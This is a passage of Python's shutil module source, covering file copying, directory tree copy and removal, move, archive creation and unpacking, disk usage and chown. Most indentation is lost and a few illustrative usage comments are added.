"""readinto()/memoryview() based variant of copyfileobj().
*fsrc* must support readinto() method and both files must be
open in binary mode.
"""
# Localize variable access to minimize overhead.
fsrc_readinto = fsrc.readinto
fdst_write = fdst.write
with memoryview(bytearray(length)) as mv:
while True:
n = fsrc_readinto(mv)
if not n:
break
elif n < length:
with mv[:n] as smv:
fdst.write(smv)
else:
fdst_write(mv)
def copyfileobj(fsrc, fdst, length=0):
"""copy data from file-like object fsrc to file-like object fdst"""
# Localize variable access to minimize overhead.
if not length:
length = COPY_BUFSIZE
fsrc_read = fsrc.read
fdst_write = fdst.write
while True:
buf = fsrc_read(length)
if not buf:
break
fdst_write(buf)
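# Example (illustrative, not part of the stdlib source): stream one open
# binary file into another in 1 MiB chunks.
#   with open("src.bin", "rb") as fsrc, open("dst.bin", "wb") as fdst:
#       copyfileobj(fsrc, fdst, length=1024 * 1024)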
def _samefile(src, dst):
# Macintosh, Unix.
if isinstance(src, os.DirEntry) and hasattr(os.path, 'samestat'):
try:
return os.path.samestat(src.stat(), os.stat(dst))
except OSError:
return False
if hasattr(os.path, 'samefile'):
try:
return os.path.samefile(src, dst)
except OSError:
return False
# All other platforms: check for same pathname.
return (os.path.normcase(os.path.abspath(src)) ==
os.path.normcase(os.path.abspath(dst)))
def _stat(fn):
return fn.stat() if isinstance(fn, os.DirEntry) else os.stat(fn)
def _islink(fn):
return fn.is_symlink() if isinstance(fn, os.DirEntry) else os.path.islink(fn)
def copyfile(src, dst, *, follow_symlinks=True):
"""Copy data from src to dst in the most efficient way possible.
If follow_symlinks is not set and src is a symbolic link, a new
symlink will be created instead of copying the file it points to.
"""
sys.audit("shutil.copyfile", src, dst)
if _samefile(src, dst):
raise SameFileError("{!r} and {!r} are the same file".format(src, dst))
file_size = 0
for i, fn in enumerate([src, dst]):
try:
st = _stat(fn)
except OSError:
# File most likely does not exist
pass
else:
# XXX What about other special files? (sockets, devices...)
if stat.S_ISFIFO(st.st_mode):
fn = fn.path if isinstance(fn, os.DirEntry) else fn
raise SpecialFileError("`%s` is a named pipe" % fn)
if _WINDOWS and i == 0:
file_size = st.st_size
if not follow_symlinks and _islink(src):
os.symlink(os.readlink(src), dst)
else:
with open(src, 'rb') as fsrc, open(dst, 'wb') as fdst:
# macOS
if _HAS_FCOPYFILE:
try:
_fastcopy_fcopyfile(fsrc, fdst, posix._COPYFILE_DATA)
return dst
except _GiveupOnFastCopy:
pass
# Linux
elif _USE_CP_SENDFILE:
try:
_fastcopy_sendfile(fsrc, fdst)
return dst
except _GiveupOnFastCopy:
pass
# Windows, see:
# https://github.com/python/cpython/pull/7160#discussion_r195405230
elif _WINDOWS and file_size > 0:
_copyfileobj_readinto(fsrc, fdst, min(file_size, COPY_BUFSIZE))
return dst
copyfileobj(fsrc, fdst)
return dst
def copymode(src, dst, *, follow_symlinks=True):
"""Copy mode bits from src to dst.
If follow_symlinks is not set, symlinks aren't followed if and only
if both `src` and `dst` are symlinks. If `lchmod` isn't available
(e.g. Linux) this method does nothing.
"""
sys.audit("shutil.copymode", src, dst)
if not follow_symlinks and _islink(src) and os.path.islink(dst):
if hasattr(os, 'lchmod'):
stat_func, chmod_func = os.lstat, os.lchmod
else:
return
else:
stat_func, chmod_func = _stat, os.chmod
st = stat_func(src)
chmod_func(dst, stat.S_IMODE(st.st_mode))
if hasattr(os, 'listxattr'):
def _copyxattr(src, dst, *, follow_symlinks=True):
"""Copy extended filesystem attributes from `src` to `dst`.
Overwrite existing attributes.
If `follow_symlinks` is false, symlinks won't be followed.
"""
try:
names = os.listxattr(src, follow_symlinks=follow_symlinks)
except OSError as e:
if e.errno not in (errno.ENOTSUP, errno.ENODATA, errno.EINVAL):
raise
return
for name in names:
try:
value = os.getxattr(src, name, follow_symlinks=follow_symlinks)
os.setxattr(dst, name, value, follow_symlinks=follow_symlinks)
except OSError as e:
if e.errno not in (errno.EPERM, errno.ENOTSUP, errno.ENODATA,
errno.EINVAL):
raise
else:
def _copyxattr(*args, **kwargs):
pass
def copystat(src, dst, *, follow_symlinks=True):
"""Copy file metadata
Copy the permission bits, last access time, last modification time, and
flags from `src` to `dst`. On Linux, copystat() also copies the "extended
attributes" where possible. The file contents, owner, and group are
unaffected. `src` and `dst` are path-like objects or path names given as
strings.
If the optional flag `follow_symlinks` is not set, symlinks aren't
followed if and only if both `src` and `dst` are symlinks.
"""
sys.audit("shutil.copystat", src, dst)
def _nop(*args, ns=None, follow_symlinks=None):
pass
# follow symlinks (aka don't not follow symlinks)
follow = follow_symlinks or not (_islink(src) and os.path.islink(dst))
if follow:
# use the real function if it exists
def lookup(name):
return getattr(os, name, _nop)
else:
# use the real function only if it exists
# *and* it supports follow_symlinks
def lookup(name):
fn = getattr(os, name, _nop)
if fn in os.supports_follow_symlinks:
return fn
return _nop
if isinstance(src, os.DirEntry):
st = src.stat(follow_symlinks=follow)
else:
st = lookup("stat")(src, follow_symlinks=follow)
mode = stat.S_IMODE(st.st_mode)
lookup("utime")(dst, ns=(st.st_atime_ns, st.st_mtime_ns),
follow_symlinks=follow)
# We must copy extended attributes before the file is (potentially)
# chmod()'ed read-only, otherwise setxattr() will error with -EACCES.
_copyxattr(src, dst, follow_symlinks=follow)
try:
lookup("chmod")(dst, mode, follow_symlinks=follow)
except NotImplementedError:
# if we got a NotImplementedError, it's because
# * follow_symlinks=False,
# * lchown() is unavailable, and
# * either
# * fchownat() is unavailable or
# * fchownat() doesn't implement AT_SYMLINK_NOFOLLOW.
# (it returned ENOSUP.)
# therefore we're out of options--we simply cannot chown the
# symlink. give up, suppress the error.
# (which is what shutil always did in this circumstance.)
pass
if hasattr(st, 'st_flags'):
try:
lookup("chflags")(dst, st.st_flags, follow_symlinks=follow)
except OSError as why:
for err in 'EOPNOTSUPP', 'ENOTSUP':
if hasattr(errno, err) and why.errno == getattr(errno, err):
break
else:
raise
def copy(src, dst, *, follow_symlinks=True):
"""Copy data and mode bits ("cp src dst"). Return the file's destination.
The destination may be a directory.
If follow_symlinks is false, symlinks won't be followed. This
resembles GNU's "cp -P src dst".
If source and destination are the same file, a SameFileError will be
raised.
"""
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
copyfile(src, dst, follow_symlinks=follow_symlinks)
copymode(src, dst, follow_symlinks=follow_symlinks)
return dst
def copy2(src, dst, *, follow_symlinks=True):
"""Copy data and metadata. Return the file's destination.
Metadata is copied with copystat(). Please see the copystat function
for more information.
The destination may be a directory.
If follow_symlinks is false, symlinks won't be followed. This
resembles GNU's "cp -P src dst".
"""
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
copyfile(src, dst, follow_symlinks=follow_symlinks)
copystat(src, dst, follow_symlinks=follow_symlinks)
return dst
def ignore_patterns(*patterns):
"""Function that can be used as copytree() ignore parameter.
Patterns is a sequence of glob-style patterns
that are used to exclude files"""
def _ignore_patterns(path, names):
ignored_names = []
for pattern in patterns:
ignored_names.extend(fnmatch.filter(names, pattern))
return set(ignored_names)
return _ignore_patterns
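# Example (illustrative): skip VCS metadata and editor backups when copying.
#   copytree("proj", "proj_copy", ignore=ignore_patterns(".git*", "*~"))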
def _copytree(entries, src, dst, symlinks, ignore, copy_function,
ignore_dangling_symlinks, dirs_exist_ok=False):
if ignore is not None:
ignored_names = ignore(os.fspath(src), [x.name for x in entries])
else:
ignored_names = set()
os.makedirs(dst, exist_ok=dirs_exist_ok)
errors = []
use_srcentry = copy_function is copy2 or copy_function is copy
for srcentry in entries:
if srcentry.name in ignored_names:
continue
srcname = os.path.join(src, srcentry.name)
dstname = os.path.join(dst, srcentry.name)
srcobj = srcentry if use_srcentry else srcname
try:
is_symlink = srcentry.is_symlink()
if is_symlink and os.name == 'nt':
# Special check for directory junctions, which appear as
# symlinks but we want to recurse.
lstat = srcentry.stat(follow_symlinks=False)
if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:
is_symlink = False
if is_symlink:
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcobj, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occur. copy2 will raise an error
if srcentry.is_dir():
copytree(srcobj, dstname, symlinks, ignore,
copy_function, dirs_exist_ok=dirs_exist_ok)
else:
copy_function(srcobj, dstname)
elif srcentry.is_dir():
copytree(srcobj, dstname, symlinks, ignore, copy_function,
dirs_exist_ok=dirs_exist_ok)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcobj, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as err:
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, 'winerror', None) is None:
errors.append((src, dst, str(why)))
if errors:
raise Error(errors)
return dst
def copytree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
ignore_dangling_symlinks=False, dirs_exist_ok=False):
"""Recursively copy a directory tree and return the destination directory.
dirs_exist_ok dictates whether to raise an exception in case dst or any
missing parent directory already exists.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
sys.audit("shutil.copytree", src, dst)
with os.scandir(src) as itr:
entries = list(itr)
return _copytree(entries=entries, src=src, dst=dst, symlinks=symlinks,
ignore=ignore, copy_function=copy_function,
ignore_dangling_symlinks=ignore_dangling_symlinks,
dirs_exist_ok=dirs_exist_ok)
if hasattr(os.stat_result, 'st_file_attributes'):
# Special handling for directory junctions to make them behave like
# symlinks for shutil.rmtree, since in general they do not appear as
# regular links.
def _rmtree_isdir(entry):
try:
st = entry.stat(follow_symlinks=False)
return (stat.S_ISDIR(st.st_mode) and not
(st.st_file_attributes & stat.FILE_ATTRIBUTE_REPARSE_POINT
and st.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT))
except OSError:
return False
def _rmtree_islink(path):
try:
st = os.lstat(path)
return (stat.S_ISLNK(st.st_mode) or
(st.st_file_attributes & stat.FILE_ATTRIBUTE_REPARSE_POINT
and st.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT))
except OSError:
return False
else:
def _rmtree_isdir(entry):
try:
return entry.is_dir(follow_symlinks=False)
except OSError:
return False
def _rmtree_islink(path):
return os.path.islink(path)
# version vulnerable to race conditions
def _rmtree_unsafe(path, onerror):
try:
with os.scandir(path) as scandir_it:
entries = list(scandir_it)
except OSError:
onerror(os.scandir, path, sys.exc_info())
entries = []
for entry in entries:
fullname = entry.path
if _rmtree_isdir(entry):
try:
if entry.is_symlink():
# This can only happen if someone replaces
# a directory with a symlink after the call to
# os.scandir or entry.is_dir above.
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, fullname, sys.exc_info())
continue
_rmtree_unsafe(fullname, onerror)
else:
try:
os.unlink(fullname)
except OSError:
onerror(os.unlink, fullname, sys.exc_info())
try:
os.rmdir(path)
except OSError:
onerror(os.rmdir, path, sys.exc_info())
# Version using fd-based APIs to protect against races
def _rmtree_safe_fd(topfd, path, onerror):
try:
with os.scandir(topfd) as scandir_it:
entries = list(scandir_it)
except OSError as err:
err.filename = path
onerror(os.scandir, path, sys.exc_info())
return
for entry in entries:
fullname = os.path.join(path, entry.name)
try:
is_dir = entry.is_dir(follow_symlinks=False)
except OSError:
is_dir = False
else:
if is_dir:
try:
orig_st = entry.stat(follow_symlinks=False)
is_dir = stat.S_ISDIR(orig_st.st_mode)
except OSError:
onerror(os.lstat, fullname, sys.exc_info())
continue
if is_dir:
try:
dirfd = os.open(entry.name, os.O_RDONLY, dir_fd=topfd)
except OSError:
onerror(os.open, fullname, sys.exc_info())
else:
try:
if os.path.samestat(orig_st, os.fstat(dirfd)):
_rmtree_safe_fd(dirfd, fullname, onerror)
try:
os.rmdir(entry.name, dir_fd=topfd)
except OSError:
onerror(os.rmdir, fullname, sys.exc_info())
else:
try:
# This can only happen if someone replaces
# a directory with a symlink after the call to
# os.scandir or stat.S_ISDIR above.
raise OSError("Cannot call rmtree on a symbolic "
"link")
except OSError:
onerror(os.path.islink, fullname, sys.exc_info())
finally:
os.close(dirfd)
else:
try:
os.unlink(entry.name, dir_fd=topfd)
except OSError:
onerror(os.unlink, fullname, sys.exc_info())
_use_fd_functions = ({os.open, os.stat, os.unlink, os.rmdir} <=
os.supports_dir_fd and
os.scandir in os.supports_fd and
os.stat in os.supports_follow_symlinks)
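# When all of the fd-based functions above are available, rmtree() walks the
# tree through directory file descriptors (the lstat()/open()/fstat() trick
# below), which defends against an attacker swapping a directory for a
# symlink mid-traversal.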
def rmtree(path, ignore_errors=False, onerror=None):
"""Recursively delete a directory tree.
If ignore_errors is set, errors are ignored; otherwise, if onerror
is set, it is called to handle the error with arguments (func,
path, exc_info) where func is platform and implementation dependent;
path is the argument to that function that caused it to fail; and
exc_info is a tuple returned by sys.exc_info(). If ignore_errors
is false and onerror is None, an exception is raised.
"""
sys.audit("shutil.rmtree", path)
if ignore_errors:
def onerror(*args):
pass
elif onerror is None:
def onerror(*args):
raise
if _use_fd_functions:
# While the unsafe rmtree works fine on bytes, the fd based does not.
if isinstance(path, bytes):
path = os.fsdecode(path)
# Note: To guard against symlink races, we use the standard
# lstat()/open()/fstat() trick.
try:
orig_st = os.lstat(path)
except Exception:
onerror(os.lstat, path, sys.exc_info())
return
try:
fd = os.open(path, os.O_RDONLY)
except Exception:
onerror(os.open, path, sys.exc_info())
return
try:
if os.path.samestat(orig_st, os.fstat(fd)):
_rmtree_safe_fd(fd, path, onerror)
try:
os.rmdir(path)
except OSError:
onerror(os.rmdir, path, sys.exc_info())
else:
try:
# symlinks to directories are forbidden, see bug #1669
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, path, sys.exc_info())
finally:
os.close(fd)
else:
try:
if _rmtree_islink(path):
# symlinks to directories are forbidden, see bug #1669
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, path, sys.exc_info())
# can't continue even if onerror hook returns
return
return _rmtree_unsafe(path, onerror)
# Allow introspection of whether or not the hardening against symlink
# attacks is supported on the current platform
rmtree.avoids_symlink_attacks = _use_fd_functions
def _basename(path):
# A basename() variant which first strips the trailing slash, if present.
# Thus we always get the last component of the path, even for directories.
sep = os.path.sep + (os.path.altsep or '')
return os.path.basename(path.rstrip(sep))
def move(src, dst, copy_function=copy2):
"""Recursively move a file or directory to another location. This is
similar to the Unix "mv" command. Return the file or directory's
destination.
If the destination is a directory or a symlink to a directory, the source
is moved inside the directory. The destination path must not already
exist.
If the destination already exists but is not a directory, it may be
overwritten depending on os.rename() semantics.
If the destination is on our current filesystem, then rename() is used.
Otherwise, src is copied to the destination and then removed. Symlinks are
recreated under the new name if os.rename() fails because of cross
filesystem renames.
The optional `copy_function` argument is a callable that will be used
to copy the source or it will be delegated to `copytree`.
By default, copy2() is used, but any function that supports the same
signature (like copy()) can be used.
A lot more could be done here... A look at a mv.c shows a lot of
the issues this implementation glosses over.
"""
sys.audit("shutil.move", src, dst)
real_dst = dst
if os.path.isdir(dst):
if _samefile(src, dst):
# We might be on a case insensitive filesystem,
# perform the rename anyway.
os.rename(src, dst)
return
real_dst = os.path.join(dst, _basename(src))
if os.path.exists(real_dst):
raise Error("Destination path '%s' already exists" % real_dst)
try:
os.rename(src, real_dst)
except OSError:
if os.path.islink(src):
linkto = os.readlink(src)
os.symlink(linkto, real_dst)
os.unlink(src)
elif os.path.isdir(src):
if _destinsrc(src, dst):
raise Error("Cannot move a directory '%s' into itself"
" '%s'." % (src, dst))
copytree(src, real_dst, copy_function=copy_function,
symlinks=True)
rmtree(src)
else:
copy_function(src, real_dst)
os.unlink(src)
return real_dst
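# Example (illustrative): moving across filesystems falls back to a copy of
# the source followed by its deletion.
#   move("/tmp/build", "/var/data/build")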
def _destinsrc(src, dst):
src = os.path.abspath(src)
dst = os.path.abspath(dst)
if not src.endswith(os.path.sep):
src += os.path.sep
if not dst.endswith(os.path.sep):
dst += os.path.sep
return dst.startswith(src)
def _get_gid(name):
"""Returns a gid, given a group name."""
if getgrnam is None or name is None:
return None
try:
result = getgrnam(name)
except KeyError:
result = None
if result is not None:
return result[2]
return None
def _get_uid(name):
"""Returns an uid, given a user name."""
if getpwnam is None or name is None:
return None
try:
result = getpwnam(name)
except KeyError:
result = None
if result is not None:
return result[2]
return None
def _make_tarball(base_name, base_dir, compress="gzip", verbose=0, dry_run=0,
owner=None, group=None, logger=None):
"""Create a (possibly compressed) tar file from all the files under
'base_dir'.
'compress' must be "gzip" (the default), "bzip2", "xz", or None.
'owner' and 'group' can be used to define an owner and a group for the
archive that is being built. If not provided, the current owner and group
will be used.
The output tar file will be named 'base_name' + ".tar", possibly plus
the appropriate compression extension (".gz", ".bz2", or ".xz").
Returns the output filename.
"""
if compress is None:
tar_compression = ''
elif _ZLIB_SUPPORTED and compress == 'gzip':
tar_compression = 'gz'
elif _BZ2_SUPPORTED and compress == 'bzip2':
tar_compression = 'bz2'
elif _LZMA_SUPPORTED and compress == 'xz':
tar_compression = 'xz'
else:
raise ValueError("bad value for 'compress', or compression format not "
"supported : {0}".format(compress))
import tarfile # late import for breaking circular dependency
compress_ext = '.' + tar_compression if compress else ''
archive_name = base_name + '.tar' + compress_ext
archive_dir = os.path.dirname(archive_name)
if archive_dir and not os.path.exists(archive_dir):
if logger is not None:
logger.info("creating %s", archive_dir)
if not dry_run:
os.makedirs(archive_dir)
# creating the tarball
if logger is not None:
logger.info('Creating tar archive')
uid = _get_uid(owner)
gid = _get_gid(group)
def _set_uid_gid(tarinfo):
if gid is not None:
tarinfo.gid = gid
tarinfo.gname = group
if uid is not None:
tarinfo.uid = uid
tarinfo.uname = owner
return tarinfo
if not dry_run:
tar = tarfile.open(archive_name, 'w|%s' % tar_compression)
try:
tar.add(base_dir, filter=_set_uid_gid)
finally:
tar.close()
return archive_name
def _make_zipfile(base_name, base_dir, verbose=0, dry_run=0, logger=None):
"""Create a zip file from all the files under 'base_dir'.
The output zip file will be named 'base_name' + ".zip". Returns the
name of the output zip file.
"""
import zipfile # late import for breaking circular dependency
zip_filename = base_name + ".zip"
archive_dir = os.path.dirname(base_name)
if archive_dir and not os.path.exists(archive_dir):
if logger is not None:
logger.info("creating %s", archive_dir)
if not dry_run:
os.makedirs(archive_dir)
if logger is not None:
logger.info("creating '%s' and adding '%s' to it",
zip_filename, base_dir)
if not dry_run:
with zipfile.ZipFile(zip_filename, "w",
compression=zipfile.ZIP_DEFLATED) as zf:
path = os.path.normpath(base_dir)
if path != os.curdir:
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
for dirpath, dirnames, filenames in os.walk(base_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
return zip_filename
_ARCHIVE_FORMATS = {
'tar': (_make_tarball, [('compress', None)], "uncompressed tar file"),
}
if _ZLIB_SUPPORTED:
_ARCHIVE_FORMATS['gztar'] = (_make_tarball, [('compress', 'gzip')],
"gzip'ed tar-file")
_ARCHIVE_FORMATS['zip'] = (_make_zipfile, [], "ZIP file")
if _BZ2_SUPPORTED:
_ARCHIVE_FORMATS['bztar'] = (_make_tarball, [('compress', 'bzip2')],
"bzip2'ed tar-file")
if _LZMA_SUPPORTED:
_ARCHIVE_FORMATS['xztar'] = (_make_tarball, [('compress', 'xz')],
"xz'ed tar-file")
def get_archive_formats():
"""Returns a list of supported formats for archiving and unarchiving.
Each element of the returned sequence is a tuple (name, description)
"""
formats = [(name, registry[2]) for name, registry in
_ARCHIVE_FORMATS.items()]
formats.sort()
return formats
def register_archive_format(name, function, extra_args=None, description=''):
"""Registers an archive format.
name is the name of the format. function is the callable that will be
used to create archives. If provided, extra_args is a sequence of
(name, value) tuples that will be passed as arguments to the callable.
description can be provided to describe the format, and will be returned
by the get_archive_formats() function.
"""
if extra_args is None:
extra_args = []
if not callable(function):
raise TypeError('The %s object is not callable' % function)
if not isinstance(extra_args, (tuple, list)):
raise TypeError('extra_args needs to be a sequence')
for element in extra_args:
        if not isinstance(element, (tuple, list)) or len(element) != 2:
            raise TypeError('extra_args elements are: (arg_name, value)')
_ARCHIVE_FORMATS[name] = (function, extra_args, description)
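# Illustrative registration sketch ('_make_7z' is a hypothetical callable, not
# part of this module):
#   register_archive_format('7zip', _make_7z, description="7z file")
#   make_archive('backup', '7zip', root_dir='/srv/app')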
def unregister_archive_format(name):
del _ARCHIVE_FORMATS[name]
def make_archive(base_name, format, root_dir=None, base_dir=None, verbose=0,
dry_run=0, owner=None, group=None, logger=None):
"""Create an archive file (eg. zip or tar).
'base_name' is the name of the file to create, minus any format-specific
extension; 'format' is the archive format: one of "zip", "tar", "gztar",
"bztar", or "xztar". Or any other registered format.
'root_dir' is a directory that will be the root directory of the
archive; ie. we typically chdir into 'root_dir' before creating the
archive. 'base_dir' is the directory where we start archiving from;
ie. 'base_dir' will be the common prefix of all files and
directories in the archive. 'root_dir' and 'base_dir' both default
to the current directory. Returns the name of the archive file.
'owner' and 'group' are used when creating a tar archive. By default,
uses the current owner and group.
"""
sys.audit("shutil.make_archive", base_name, format, root_dir, base_dir)
save_cwd = os.getcwd()
if root_dir is not None:
if logger is not None:
logger.debug("changing into '%s'", root_dir)
base_name = os.path.abspath(base_name)
if not dry_run:
os.chdir(root_dir)
if base_dir is None:
base_dir = os.curdir
kwargs = {'dry_run': dry_run, 'logger': logger}
try:
format_info = _ARCHIVE_FORMATS[format]
except KeyError:
raise ValueError("unknown archive format '%s'" % format) from None
func = format_info[0]
for arg, val in format_info[1]:
kwargs[arg] = val
if format != 'zip':
kwargs['owner'] = owner
kwargs['group'] = group
try:
filename = func(base_name, base_dir, **kwargs)
finally:
if root_dir is not None:
if logger is not None:
logger.debug("changing back to '%s'", save_cwd)
os.chdir(save_cwd)
return filename
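# Example (illustrative paths): make_archive('backup', 'gztar', root_dir='/srv/app')
# archives everything under /srv/app and returns the path of 'backup.tar.gz',
# created relative to the directory that was current at call time.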
def get_unpack_formats():
"""Returns a list of supported formats for unpacking.
Each element of the returned sequence is a tuple
(name, extensions, description)
"""
formats = [(name, info[0], info[3]) for name, info in
_UNPACK_FORMATS.items()]
formats.sort()
return formats
def _check_unpack_options(extensions, function, extra_args):
"""Checks what gets registered as an unpacker."""
# first make sure no other unpacker is registered for this extension
existing_extensions = {}
for name, info in _UNPACK_FORMATS.items():
for ext in info[0]:
existing_extensions[ext] = name
for extension in extensions:
if extension in existing_extensions:
msg = '%s is already registered for "%s"'
raise RegistryError(msg % (extension,
existing_extensions[extension]))
if not callable(function):
raise TypeError('The registered function must be a callable')
def register_unpack_format(name, extensions, function, extra_args=None,
description=''):
"""Registers an unpack format.
`name` is the name of the format. `extensions` is a list of extensions
corresponding to the format.
`function` is the callable that will be
used to unpack archives. The callable will receive archives to unpack.
If it's unable to handle an archive, it needs to raise a ReadError
exception.
If provided, `extra_args` is a sequence of
(name, value) tuples that will be passed as arguments to the callable.
description can be provided to describe the format, and will be returned
by the get_unpack_formats() function.
"""
if extra_args is None:
extra_args = []
_check_unpack_options(extensions, function, extra_args)
_UNPACK_FORMATS[name] = extensions, function, extra_args, description
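# Illustrative registration sketch ('_unpack_rar' is a hypothetical callable,
# not part of this module); an unpacker must raise ReadError for files it
# cannot handle:
#   register_unpack_format('rar', ['.rar'], _unpack_rar)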
def unregister_unpack_format(name):
"""Removes the pack format from the registry."""
del _UNPACK_FORMATS[name]
def _ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _unpack_zipfile(filename, extract_dir):
"""Unpack zip `filename` to `extract_dir`
"""
import zipfile # late import for breaking circular dependency
if not zipfile.is_zipfile(filename):
raise ReadError("%s is not a zip file" % filename)
    with zipfile.ZipFile(filename) as zf:
        for info in zf.infolist():
            name = info.filename
            # don't extract absolute paths or ones with .. in them
            if name.startswith('/') or '..' in name:
                continue
            target = os.path.join(extract_dir, *name.split('/'))
            if not target:
                continue
            _ensure_directory(target)
            if not name.endswith('/'):
                # file
                with open(target, 'wb') as f:
                    f.write(zf.read(info.filename))
def _unpack_tarfile(filename, extract_dir):
"""Unpack tar/tar.gz/tar.bz2/tar.xz `filename` to `extract_dir`
"""
import tarfile # late import for breaking circular dependency
try:
tarobj = tarfile.open(filename)
except tarfile.TarError:
raise ReadError(
"%s is not a compressed or uncompressed tar file" % filename)
try:
tarobj.extractall(extract_dir)
finally:
tarobj.close()
_UNPACK_FORMATS = {
'tar': (['.tar'], _unpack_tarfile, [], "uncompressed tar file"),
'zip': (['.zip'], _unpack_zipfile, [], "ZIP file"),
}
if _ZLIB_SUPPORTED:
_UNPACK_FORMATS['gztar'] = (['.tar.gz', '.tgz'], _unpack_tarfile, [],
"gzip'ed tar-file")
if _BZ2_SUPPORTED:
_UNPACK_FORMATS['bztar'] = (['.tar.bz2', '.tbz2'], _unpack_tarfile, [],
"bzip2'ed tar-file")
if _LZMA_SUPPORTED:
_UNPACK_FORMATS['xztar'] = (['.tar.xz', '.txz'], _unpack_tarfile, [],
"xz'ed tar-file")
def _find_unpack_format(filename):
for name, info in _UNPACK_FORMATS.items():
for extension in info[0]:
if filename.endswith(extension):
return name
return None
def unpack_archive(filename, extract_dir=None, format=None):
"""Unpack an archive.
`filename` is the name of the archive.
`extract_dir` is the name of the target directory, where the archive
is unpacked. If not provided, the current working directory is used.
`format` is the archive format: one of "zip", "tar", "gztar", "bztar",
or "xztar". Or any other registered format. If not provided,
unpack_archive will use the filename extension and see if an unpacker
was registered for that extension.
In case none is found, a ValueError is raised.
"""
sys.audit("shutil.unpack_archive", filename, extract_dir, format)
if extract_dir is None:
extract_dir = os.getcwd()
extract_dir = os.fspath(extract_dir)
filename = os.fspath(filename)
if format is not None:
try:
format_info = _UNPACK_FORMATS[format]
except KeyError:
raise ValueError("Unknown unpack format '{0}'".format(format)) from None
func = format_info[1]
func(filename, extract_dir, **dict(format_info[2]))
else:
# we need to look at the registered unpackers supported extensions
format = _find_unpack_format(filename)
if format is None:
raise ReadError("Unknown archive format '{0}'".format(filename))
func = _UNPACK_FORMATS[format][1]
kwargs = dict(_UNPACK_FORMATS[format][2])
func(filename, extract_dir, **kwargs)
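# Example (illustrative): unpack_archive('backup.tar.gz', '/tmp/out') infers the
# 'gztar' format from the filename extension via _find_unpack_format.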
if hasattr(os, 'statvfs'):
__all__.append('disk_usage')
_ntuple_diskusage = collections.namedtuple('usage', 'total used free')
_ntuple_diskusage.total.__doc__ = 'Total space in bytes'
_ntuple_diskusage.used.__doc__ = 'Used space in bytes'
_ntuple_diskusage.free.__doc__ = 'Free space in bytes'
def disk_usage(path):
"""Return disk usage statistics about the given path.
Returned value is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
"""
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
return _ntuple_diskusage(total, used, free)
elif _WINDOWS:
__all__.append('disk_usage')
_ntuple_diskusage = collections.namedtuple('usage', 'total used free')
def disk_usage(path):
"""Return disk usage statistics about the given path.
Returned values is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
"""
total, free = nt._getdiskusage(path)
used = total - free
return _ntuple_diskusage(total, used, free)
def chown(path, user=None, group=None):
"""Change owner user and group of the given path.
user and group can be the uid/gid or the user/group names, and in that case,
they are converted to their respective uid/gid.
"""
sys.audit('shutil.chown', path, user, group)
if user is None and group is None:
raise ValueError("user and/or group must be set")
_user = user
_group = group
# -1 means don't change it
if user is None:
_user = -1
# user can either be an int (the uid) or a string (the system username)
elif isinstance(user, str):
_user = _get_uid(user)
if _user is None:
raise LookupError("no such user: {!r}".format(user))
if group is None:
_group = -1
elif not isinstance(group, int):
_group = _get_gid(group)
if _group is None:
raise LookupError("no such group: {!r}".format(group))
os.chown(path, _user, _group)
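# Example (illustrative names): chown('/srv/app/app.log', user='www-data',
# group='www-data') resolves both names to ids and calls os.chown once.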
def get_terminal_size(fallback=(80, 24)):
"""Get the size of the terminal window.
For each of the two dimensions, the environment variable, COLUMNS
and LINES respectively, is checked. If the variable is defined and
the value is a positive integer, it is used.
When COLUMNS or LINES is not defined, which is the common case,
the terminal connected to sys.__stdout__ is queried
by invoking os.get_terminal_size.
If the terminal size cannot be successfully queried, either because
the system doesn't support querying, or because we are not
connected to a terminal, the value given in fallback parameter
is used. Fallback defaults to (80, 24) which is the default
size used by many terminal emulators.
The value returned is a named tuple of type os.terminal_size.
"""
# columns, lines are the working values
try:
columns = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
columns = 0
try:
